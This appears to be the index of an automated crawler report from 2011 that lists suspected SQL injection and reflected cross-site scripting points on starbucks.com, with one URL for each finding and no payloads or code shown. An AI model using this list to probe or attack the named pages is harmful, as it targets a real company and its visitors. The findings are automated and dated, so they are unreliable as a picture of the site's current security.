XSS, starbucks.com, Cross Site Scripting, Proof of Concept

XSS in starbucks.com | Vulnerability Crawler Report

Report generated by XSS.CX at Tue Feb 08 11:37:52 CST 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

Loading

1. SQL injection

1.1. http://www.starbucks.com/menu/food/salads/fruit-cup [name of an arbitrarily supplied request parameter]

1.2. http://www.starbucks.com/menu/food/salads/picnic-pasta-salad [name of an arbitrarily supplied request parameter]

2. Cross-site scripting (reflected)

2.1. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]

2.2. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]

2.3. http://www.starbucks.com/about-us [name of an arbitrarily supplied request parameter]

2.4. http://www.starbucks.com/about-us/company-information [name of an arbitrarily supplied request parameter]

2.5. http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement [name of an arbitrarily supplied request parameter]

2.6. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use [name of an arbitrarily supplied request parameter]

2.7. http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility [name of an arbitrarily supplied request parameter]

2.8. http://www.starbucks.com/about-us/company-information/product-advisories [name of an arbitrarily supplied request parameter]

2.9. http://www.starbucks.com/about-us/our-heritage [name of an arbitrarily supplied request parameter]

2.10. http://www.starbucks.com/business [name of an arbitrarily supplied request parameter]

2.11. http://www.starbucks.com/business/foodservice [name of an arbitrarily supplied request parameter]

2.12. http://www.starbucks.com/business/international-stores [name of an arbitrarily supplied request parameter]

2.13. http://www.starbucks.com/business/licensed-stores [name of an arbitrarily supplied request parameter]

2.14. http://www.starbucks.com/business/office-coffee [name of an arbitrarily supplied request parameter]

2.15. http://www.starbucks.com/career-center [name of an arbitrarily supplied request parameter]

2.16. http://www.starbucks.com/career-center [name of an arbitrarily supplied request parameter]

2.17. http://www.starbucks.com/career-center/career-diversity [name of an arbitrarily supplied request parameter]

2.18. http://www.starbucks.com/career-center/career-diversity/partner-networks [name of an arbitrarily supplied request parameter]

2.19. http://www.starbucks.com/career-center/career-diversity/partner-networks [name of an arbitrarily supplied request parameter]

2.20. http://www.starbucks.com/career-center/international-positions [name of an arbitrarily supplied request parameter]

2.21. http://www.starbucks.com/career-center/working-at-starbucks [name of an arbitrarily supplied request parameter]

2.22. http://www.starbucks.com/career-center/working-at-starbucks [name of an arbitrarily supplied request parameter]

2.23. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]

2.24. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]

2.25. http://www.starbucks.com/coffee/learn [name of an arbitrarily supplied request parameter]

2.26. http://www.starbucks.com/coffee/learn/clover [name of an arbitrarily supplied request parameter]

2.27. http://www.starbucks.com/coffee/learn/flavors-in-your-cup [name of an arbitrarily supplied request parameter]

2.28. http://www.starbucks.com/coffee/starbucks-natural-fusions [name of an arbitrarily supplied request parameter]

2.29. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel [name of an arbitrarily supplied request parameter]

2.30. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon [name of an arbitrarily supplied request parameter]

2.31. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring [name of an arbitrarily supplied request parameter]

2.32. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla [name of an arbitrarily supplied request parameter]

2.33. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]

2.34. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]

2.35. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]

2.36. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia [name of an arbitrarily supplied request parameter]

2.37. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia [name of an arbitrarily supplied request parameter]

2.38. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java [name of an arbitrarily supplied request parameter]

2.39. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java [name of an arbitrarily supplied request parameter]

2.40. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria [name of an arbitrarily supplied request parameter]

2.41. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria [name of an arbitrarily supplied request parameter]

2.42. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]

2.43. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]

2.44. http://www.starbucks.com/coffee/via/flavored-coffee [name of an arbitrarily supplied request parameter]

2.45. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]

2.46. http://www.starbucks.com/coffee/whole-bean-coffee [name of an arbitrarily supplied request parameter]

2.47. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]

2.48. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]

2.49. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]

2.50. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]

2.51. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]

2.52. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]

2.53. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast [name of an arbitrarily supplied request parameter]

2.54. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast [name of an arbitrarily supplied request parameter]

2.55. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]

2.56. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]

2.57. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]

2.58. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]

2.59. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]

2.60. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]

2.61. http://www.starbucks.com/coffeehouse/community [name of an arbitrarily supplied request parameter]

2.62. http://www.starbucks.com/coffeehouse/community/mystarbucksidea [name of an arbitrarily supplied request parameter]

2.63. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]

2.64. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]

2.65. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]

2.66. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]

2.67. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks [name of an arbitrarily supplied request parameter]

2.68. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile [name of an arbitrarily supplied request parameter]

2.69. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb [name of an arbitrarily supplied request parameter]

2.70. http://www.starbucks.com/coffeehouse/store-design [name of an arbitrarily supplied request parameter]

2.71. http://www.starbucks.com/coffeehouse/wireless-internet [name of an arbitrarily supplied request parameter]

2.72. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada [name of an arbitrarily supplied request parameter]

2.73. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network [name of an arbitrarily supplied request parameter]

2.74. http://www.starbucks.com/customer-service [name of an arbitrarily supplied request parameter]

2.75. http://www.starbucks.com/customer-service/contact [name of an arbitrarily supplied request parameter]

2.76. http://www.starbucks.com/customer-service/faqs/card [name of an arbitrarily supplied request parameter]

2.77. http://www.starbucks.com/customer-service/faqs/coffee [name of an arbitrarily supplied request parameter]

2.78. http://www.starbucks.com/customer-service/faqs/coffeehouse [name of an arbitrarily supplied request parameter]

2.79. http://www.starbucks.com/customer-service/faqs/menu [name of an arbitrarily supplied request parameter]

2.80. http://www.starbucks.com/customer-service/faqs/responsibility [name of an arbitrarily supplied request parameter]

2.81. http://www.starbucks.com/customer-service/faqs/shop [name of an arbitrarily supplied request parameter]

2.82. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]

2.83. http://www.starbucks.com/menu/ [name of an arbitrarily supplied request parameter]

2.84. http://www.starbucks.com/menu/catalog/nutrition [name of an arbitrarily supplied request parameter]

2.85. http://www.starbucks.com/menu/catalog/nutrition [wellness parameter]

2.86. http://www.starbucks.com/menu/drinks [name of an arbitrarily supplied request parameter]

2.87. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha [name of an arbitrarily supplied request parameter]

2.88. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-mocha [name of an arbitrarily supplied request parameter]

2.89. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-vanilla [name of an arbitrarily supplied request parameter]

2.90. http://www.starbucks.com/menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

2.91. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

2.92. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-frappuccino [name of an arbitrarily supplied request parameter]

2.93. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-doubleshot [name of an arbitrarily supplied request parameter]

2.94. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot [name of an arbitrarily supplied request parameter]

2.95. http://www.starbucks.com/menu/drinks/bottled-drinks/mocha-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

2.96. http://www.starbucks.com/menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

2.97. http://www.starbucks.com/menu/drinks/brewed-coffee/bold-pick-of-the-day [name of an arbitrarily supplied request parameter]

2.98. http://www.starbucks.com/menu/drinks/brewed-coffee/cafe-misto [name of an arbitrarily supplied request parameter]

2.99. http://www.starbucks.com/menu/drinks/brewed-coffee/clover-brewed-coffee [name of an arbitrarily supplied request parameter]

2.100. http://www.starbucks.com/menu/drinks/brewed-coffee/coffee-traveler [name of an arbitrarily supplied request parameter]

2.101. http://www.starbucks.com/menu/drinks/brewed-coffee/decaf-pike-place-roast [name of an arbitrarily supplied request parameter]

2.102. http://www.starbucks.com/menu/drinks/brewed-coffee/iced-coffee [name of an arbitrarily supplied request parameter]

2.103. http://www.starbucks.com/menu/drinks/brewed-coffee/pikes-place-roast [name of an arbitrarily supplied request parameter]

2.104. http://www.starbucks.com/menu/drinks/chocolate/hot-chocolate [name of an arbitrarily supplied request parameter]

2.105. http://www.starbucks.com/menu/drinks/chocolate/peppermint-mocha-hot-chocolate [name of an arbitrarily supplied request parameter]

2.106. http://www.starbucks.com/menu/drinks/chocolate/salted-caramel-hot-chocolate [name of an arbitrarily supplied request parameter]

2.107. http://www.starbucks.com/menu/drinks/chocolate/white-hot-chocolate [name of an arbitrarily supplied request parameter]

2.108. http://www.starbucks.com/menu/drinks/espresso/caffe-americano [name of an arbitrarily supplied request parameter]

2.109. http://www.starbucks.com/menu/drinks/espresso/caffe-latte [name of an arbitrarily supplied request parameter]

2.110. http://www.starbucks.com/menu/drinks/espresso/caffe-mocha [name of an arbitrarily supplied request parameter]

2.111. http://www.starbucks.com/menu/drinks/espresso/cappuccino [name of an arbitrarily supplied request parameter]

2.112. http://www.starbucks.com/menu/drinks/espresso/caramel-brulee-latte [name of an arbitrarily supplied request parameter]

2.113. http://www.starbucks.com/menu/drinks/espresso/caramel-macchiato [name of an arbitrarily supplied request parameter]

2.114. http://www.starbucks.com/menu/drinks/espresso/cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]

2.115. http://www.starbucks.com/menu/drinks/espresso/eggnog-latte [name of an arbitrarily supplied request parameter]

2.116. http://www.starbucks.com/menu/drinks/espresso/espresso-con-panna [name of an arbitrarily supplied request parameter]

2.117. http://www.starbucks.com/menu/drinks/espresso/espresso-macchiato [name of an arbitrarily supplied request parameter]

2.118. http://www.starbucks.com/menu/drinks/espresso/espresso-shot [name of an arbitrarily supplied request parameter]

2.119. http://www.starbucks.com/menu/drinks/espresso/flavored-latte [name of an arbitrarily supplied request parameter]

2.120. http://www.starbucks.com/menu/drinks/espresso/gingerbread-latte [name of an arbitrarily supplied request parameter]

2.121. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-americano [name of an arbitrarily supplied request parameter]

2.122. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-latte [name of an arbitrarily supplied request parameter]

2.123. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-mocha [name of an arbitrarily supplied request parameter]

2.124. http://www.starbucks.com/menu/drinks/espresso/iced-caramel-macchiato [name of an arbitrarily supplied request parameter]

2.125. http://www.starbucks.com/menu/drinks/espresso/iced-cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]

2.126. http://www.starbucks.com/menu/drinks/espresso/iced-flavored-latte [name of an arbitrarily supplied request parameter]

2.127. http://www.starbucks.com/menu/drinks/espresso/iced-gingerbread-latte [name of an arbitrarily supplied request parameter]

2.128. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-mocha [name of an arbitrarily supplied request parameter]

2.129. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-white-chocolate-mocha [name of an arbitrarily supplied request parameter]

2.130. http://www.starbucks.com/menu/drinks/espresso/iced-pumpkin-spice-latte [name of an arbitrarily supplied request parameter]

2.131. http://www.starbucks.com/menu/drinks/espresso/iced-skinny-flavored-latte [name of an arbitrarily supplied request parameter]

2.132. http://www.starbucks.com/menu/drinks/espresso/iced-toffee-mocha [name of an arbitrarily supplied request parameter]

2.133. http://www.starbucks.com/menu/drinks/espresso/iced-white-chocolate-mocha [name of an arbitrarily supplied request parameter]

2.134. http://www.starbucks.com/menu/drinks/espresso/peppermint-mocha [name of an arbitrarily supplied request parameter]

2.135. http://www.starbucks.com/menu/drinks/espresso/peppermint-white-chocolate-mocha [name of an arbitrarily supplied request parameter]

2.136. http://www.starbucks.com/menu/drinks/espresso/pumpkin-spice-latte [name of an arbitrarily supplied request parameter]

2.137. http://www.starbucks.com/menu/drinks/espresso/skinny-caramel-macchiato [name of an arbitrarily supplied request parameter]

2.138. http://www.starbucks.com/menu/drinks/espresso/skinny-cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]

2.139. http://www.starbucks.com/menu/drinks/espresso/skinny-flavored-latte [name of an arbitrarily supplied request parameter]

2.140. http://www.starbucks.com/menu/drinks/espresso/toffee-mocha [name of an arbitrarily supplied request parameter]

2.141. http://www.starbucks.com/menu/drinks/espresso/white-chocolate-mocha [name of an arbitrarily supplied request parameter]

2.142. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages [name of an arbitrarily supplied request parameter]

2.143. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.144. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

2.145. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

2.146. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.147. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

2.148. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

2.149. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.150. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

2.151. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

2.152. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.153. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

2.154. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

2.155. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.156. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

2.157. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

2.158. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.159. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

2.160. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.161. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

2.162. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

2.163. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]

2.164. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

2.165. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

2.166. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]

2.167. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

2.168. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

2.169. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

2.170. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]

2.171. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

2.172. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

2.173. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

2.174. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/caramel-apple-spice [name of an arbitrarily supplied request parameter]

2.175. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/cold-apple-juice [name of an arbitrarily supplied request parameter]

2.176. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/flavored-steamed-milk [name of an arbitrarily supplied request parameter]

2.177. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/milk [name of an arbitrarily supplied request parameter]

2.178. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/steamed-apple-juice [name of an arbitrarily supplied request parameter]

2.179. http://www.starbucks.com/menu/drinks/tazo-tea/awake [name of an arbitrarily supplied request parameter]

2.180. http://www.starbucks.com/menu/drinks/tazo-tea/awake-tea-latte [name of an arbitrarily supplied request parameter]

2.181. http://www.starbucks.com/menu/drinks/tazo-tea/black-shaken-iced-tea [name of an arbitrarily supplied request parameter]

2.182. http://www.starbucks.com/menu/drinks/tazo-tea/calm [name of an arbitrarily supplied request parameter]

2.183. http://www.starbucks.com/menu/drinks/tazo-tea/chai-latte [name of an arbitrarily supplied request parameter]

2.184. http://www.starbucks.com/menu/drinks/tazo-tea/china-green-tips [name of an arbitrarily supplied request parameter]

2.185. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey [name of an arbitrarily supplied request parameter]

2.186. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey-tea-latte [name of an arbitrarily supplied request parameter]

2.187. http://www.starbucks.com/menu/drinks/tazo-tea/green-tea-latte [name of an arbitrarily supplied request parameter]

2.188. http://www.starbucks.com/menu/drinks/tazo-tea/iced-awake-tea-latte [name of an arbitrarily supplied request parameter]

2.189. http://www.starbucks.com/menu/drinks/tazo-tea/iced-chai-tea-latte [name of an arbitrarily supplied request parameter]

2.190. http://www.starbucks.com/menu/drinks/tazo-tea/iced-green-tea-latte [name of an arbitrarily supplied request parameter]

2.191. http://www.starbucks.com/menu/drinks/tazo-tea/orange-blossom [name of an arbitrarily supplied request parameter]

2.192. http://www.starbucks.com/menu/drinks/tazo-tea/passion [name of an arbitrarily supplied request parameter]

2.193. http://www.starbucks.com/menu/drinks/tazo-tea/refresh [name of an arbitrarily supplied request parameter]

2.194. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade [name of an arbitrarily supplied request parameter]

2.195. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea [name of an arbitrarily supplied request parameter]

2.196. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade [name of an arbitrarily supplied request parameter]

2.197. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea [name of an arbitrarily supplied request parameter]

2.198. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade [name of an arbitrarily supplied request parameter]

2.199. http://www.starbucks.com/menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea [name of an arbitrarily supplied request parameter]

2.200. http://www.starbucks.com/menu/drinks/tazo-tea/vanilla-roobios-tea-latte [name of an arbitrarily supplied request parameter]

2.201. http://www.starbucks.com/menu/drinks/tazo-tea/zen [name of an arbitrarily supplied request parameter]

2.202. http://www.starbucks.com/menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie [name of an arbitrarily supplied request parameter]

2.203. http://www.starbucks.com/menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie [name of an arbitrarily supplied request parameter]

2.204. http://www.starbucks.com/menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie [name of an arbitrarily supplied request parameter]

2.205. http://www.starbucks.com/menu/food [name of an arbitrarily supplied request parameter]

2.206. http://www.starbucks.com/menu/food/bakery/8-grain-roll [name of an arbitrarily supplied request parameter]

2.207. http://www.starbucks.com/menu/food/bakery/apple-bran-muffin [name of an arbitrarily supplied request parameter]

2.208. http://www.starbucks.com/menu/food/bakery/apple-fritter [name of an arbitrarily supplied request parameter]

2.209. http://www.starbucks.com/menu/food/bakery/asiago-bagel [name of an arbitrarily supplied request parameter]

2.210. http://www.starbucks.com/menu/food/bakery/banana-nut-loaf [name of an arbitrarily supplied request parameter]

2.211. http://www.starbucks.com/menu/food/bakery/birthday-cake-mini-doughnut [name of an arbitrarily supplied request parameter]

2.212. http://www.starbucks.com/menu/food/bakery/blueberry-oat-bar [name of an arbitrarily supplied request parameter]

2.213. http://www.starbucks.com/menu/food/bakery/blueberry-scone [name of an arbitrarily supplied request parameter]

2.214. http://www.starbucks.com/menu/food/bakery/blueberry-streusel-muffin [name of an arbitrarily supplied request parameter]

2.215. http://www.starbucks.com/menu/food/bakery/butter-croissant [name of an arbitrarily supplied request parameter]

2.216. http://www.starbucks.com/menu/food/bakery/cheese-danish [name of an arbitrarily supplied request parameter]

2.217. http://www.starbucks.com/menu/food/bakery/chocolate-chunk-cookie [name of an arbitrarily supplied request parameter]

2.218. http://www.starbucks.com/menu/food/bakery/chocolate-croissant [name of an arbitrarily supplied request parameter]

2.219. http://www.starbucks.com/menu/food/bakery/chocolate-old-fashion-doughnut [name of an arbitrarily supplied request parameter]

2.220. http://www.starbucks.com/menu/food/bakery/chonga-bagel [name of an arbitrarily supplied request parameter]

2.221. http://www.starbucks.com/menu/food/bakery/cinnamon-chip-scone [name of an arbitrarily supplied request parameter]

2.222. http://www.starbucks.com/menu/food/bakery/cranberry-orange-scone [name of an arbitrarily supplied request parameter]

2.223. http://www.starbucks.com/menu/food/bakery/double-chocolate-brownie [name of an arbitrarily supplied request parameter]

2.224. http://www.starbucks.com/menu/food/bakery/double-fudge-mini-doughnut [name of an arbitrarily supplied request parameter]

2.225. http://www.starbucks.com/menu/food/bakery/double-iced-cinnamon-roll [name of an arbitrarily supplied request parameter]

2.226. http://www.starbucks.com/menu/food/bakery/ginger-molasses-cookie [name of an arbitrarily supplied request parameter]

2.227. http://www.starbucks.com/menu/food/bakery/hawaiian-bagel [name of an arbitrarily supplied request parameter]

2.228. http://www.starbucks.com/menu/food/bakery/iced-lemon-pound-cake [name of an arbitrarily supplied request parameter]

2.229. http://www.starbucks.com/menu/food/bakery/low-fat-raspberry-sunshine-muffin [name of an arbitrarily supplied request parameter]

2.230. http://www.starbucks.com/menu/food/bakery/mallorca-sweet-bread [name of an arbitrarily supplied request parameter]

2.231. http://www.starbucks.com/menu/food/bakery/maple-oat-pecan-scone [name of an arbitrarily supplied request parameter]

2.232. http://www.starbucks.com/menu/food/bakery/marble-pound-cake [name of an arbitrarily supplied request parameter]

2.233. http://www.starbucks.com/menu/food/bakery/marshmallow-dream-bar [name of an arbitrarily supplied request parameter]

2.234. http://www.starbucks.com/menu/food/bakery/morning-bun [name of an arbitrarily supplied request parameter]

2.235. http://www.starbucks.com/menu/food/bakery/multigrain-bagel [name of an arbitrarily supplied request parameter]

2.236. http://www.starbucks.com/menu/food/bakery/old-fashion-glazed-doughnut [name of an arbitrarily supplied request parameter]

2.237. http://www.starbucks.com/menu/food/bakery/outrageous-oatmeal-cookie [name of an arbitrarily supplied request parameter]

2.238. http://www.starbucks.com/menu/food/bakery/petite-vanilla-bean-scone [name of an arbitrarily supplied request parameter]

2.239. http://www.starbucks.com/menu/food/bakery/plain-bagel [name of an arbitrarily supplied request parameter]

2.240. http://www.starbucks.com/menu/food/bakery/pumpkin-bread [name of an arbitrarily supplied request parameter]

2.241. http://www.starbucks.com/menu/food/bakery/raspberry-scone [name of an arbitrarily supplied request parameter]

2.242. http://www.starbucks.com/menu/food/bakery/red-velvet-cupcake [name of an arbitrarily supplied request parameter]

2.243. http://www.starbucks.com/menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake [name of an arbitrarily supplied request parameter]

2.244. http://www.starbucks.com/menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake [name of an arbitrarily supplied request parameter]

2.245. http://www.starbucks.com/menu/food/bakery/reduced-fat-very-berry-coffeecake [name of an arbitrarily supplied request parameter]

2.246. http://www.starbucks.com/menu/food/bakery/starbucks-classic-coffee-cake [name of an arbitrarily supplied request parameter]

2.247. http://www.starbucks.com/menu/food/bakery/treat-sized-double-chocolate-cookie [name of an arbitrarily supplied request parameter]

2.248. http://www.starbucks.com/menu/food/bakery/treat-sized-peanut-butter-cookie [name of an arbitrarily supplied request parameter]

2.249. http://www.starbucks.com/menu/food/bakery/vanilla-bean-cupcake [name of an arbitrarily supplied request parameter]

2.250. http://www.starbucks.com/menu/food/bakery/zucchini-walnut-muffin [name of an arbitrarily supplied request parameter]

2.251. http://www.starbucks.com/menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate [name of an arbitrarily supplied request parameter]

2.252. http://www.starbucks.com/menu/food/fruit-and-snack-plates/fruit-and-cheese-plate [name of an arbitrarily supplied request parameter]

2.253. http://www.starbucks.com/menu/food/fruit-and-snack-plates/protein-plate [name of an arbitrarily supplied request parameter]

2.254. http://www.starbucks.com/menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll [name of an arbitrarily supplied request parameter]

2.255. http://www.starbucks.com/menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap [name of an arbitrarily supplied request parameter]

2.256. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-brown-sugar [name of an arbitrarily supplied request parameter]

2.257. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-dried-fruit [name of an arbitrarily supplied request parameter]

2.258. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-mixed-nuts [name of an arbitrarily supplied request parameter]

2.259. http://www.starbucks.com/menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin [name of an arbitrarily supplied request parameter]

2.260. http://www.starbucks.com/menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin [name of an arbitrarily supplied request parameter]

2.261. http://www.starbucks.com/menu/food/hot-breakfast/starbucks-perfect-oatmeal [name of an arbitrarily supplied request parameter]

